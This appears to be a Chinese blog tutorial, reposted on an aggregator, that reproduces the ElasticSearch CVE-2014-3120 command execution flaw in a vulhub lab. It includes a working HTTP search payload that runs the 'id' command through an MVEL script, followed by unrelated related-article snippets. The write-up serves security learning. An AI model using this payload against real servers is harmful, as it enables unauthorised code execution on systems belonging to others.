ElasticSearch 命令执行漏洞(CVE-2014-3120)

news/2025/2/12 15:11:02/

前言

本文内容仅为技术科普,请勿用于非法用途!

原理

这个漏洞实际上非常简单,ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。而在ElasticSearch里,默认配置是打开动态脚本功能的,因此用户可以直接通过http请求,执行任意代码。

一、环境配置

vulhub环境搭建,搭建教程如下:

1.博客链接:https://blog.csdn.net/WEARE001/article/details/124120050?spm=1001.2014.3001.5501
2.关注微信公众号【安全info】,输入【vulhub搭建教程】即可获取。
jre版本:openjdk:8-jre
elasticsearch版本:v1.1.1

二、启动docker环境

cd /CVE/vulhub-master/elasticsearch/CVE-2014-3120
docker-compose up -d

在这里插入图片描述

9200 端口已开启
访问目标(localhost)的9200,会出现Elasticsearch的信息:
在这里插入图片描述

三、漏洞利用

利用该漏洞要求Elasticsearch中有数据,所以先创建一条数据,采用Burp发送数据包:

POST /website/blog/  HTTP/1.1
Host: 192.168.91.130:9200
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 27
{
"name": "colleget"
}

返回201状态码,代表创建成功;
在这里插入图片描述

利用该漏洞的Payload如下:

POST /_search?pretty HTTP/1.1
Host: 192.168.91.130:9200
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 368
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();"
}
}
}
}
}

返回结果如下:

在这里插入图片描述
更多内容分享,请关注微信公众号“安全info”


http://www.ppmy.cn/news/405484.html

相关文章

【vulhub】ElasticSearch 命令执行漏洞(CVE-2014-3120)漏洞验证与getshell

漏洞详情 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。elasticsearch版本:v1.1.1 详细过程请看 CVE-2014-3120 …

ElasticSearch漏洞复现

目录 ElasticSearch简介ElasticSearch _search API概述 ElasticSearch 漏洞复现ElasticSearch CVE-2014-3120复现ElasticSearch CVE-2015-1427复现 ElasticSearch简介 Elasticsearch(以下简称ES)是目前全文搜索引擎的首选。它是一个基于 Lucene 的搜索服…

3120祭

那天突然你没有电了,回到家我急匆匆地找了另为一块电池给你换上,可是可是换了电池的你竟然无法开机,于是以为电池没有放好,反复试了n变才很不情愿地相信是你坏了。你知道我当时的感觉吗,简直是灭顶之灾的说&#xff0c…

C语言跨年烟花代码,C语言实现烟花表白代码

现在大家是不是都觉得程序员不懂浪漫?那真的大错特错,今天就让你们看看什么是程序员的浪漫! 我们今天就来写写《烟花》表白程序,不要惊讶,不要激动,学会了快去拿给心中的那个人看!!&…

密码学RSA计算求密钥d

在RSA密码体制中,取 p61,q53,e17 请找出密钥d。 解:φ(n)(p-1)(q-1)60*523120 ed mod(φ(n)) 1 17d mod(3120)…

IR2130与MOSFET驱动电路分析

1.IR2130与MOS管总体驱动框图 2.IR2130芯片简单介绍 是一款很老的片子。 IR公司推出的IR21xx系列集成芯片是MOS、IGBT功率器件专用栅极驱动芯片,通过自举电路工作原理,使其既能驱动桥式电路中低压侧的功率器件,又能驱动高压侧的功率元件&am…

CVE-2014-3120 (命令执行漏洞)

环境配置 vulhub环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 启动docker环境 cd vulhub-master/elasticsearch/CVE-2014-3120/ sudo docker-compose up9200 端口已开启 访问目标的9200,会出现Elasticsearch的信息: 利用该…

3120卷

今天算了一下,突然发现了古人读书破万卷有些难度: 1(一本)*52(一年52周)*60(从20岁开始活到80岁)3120本 只达到古人的万卷的1/3不到呀!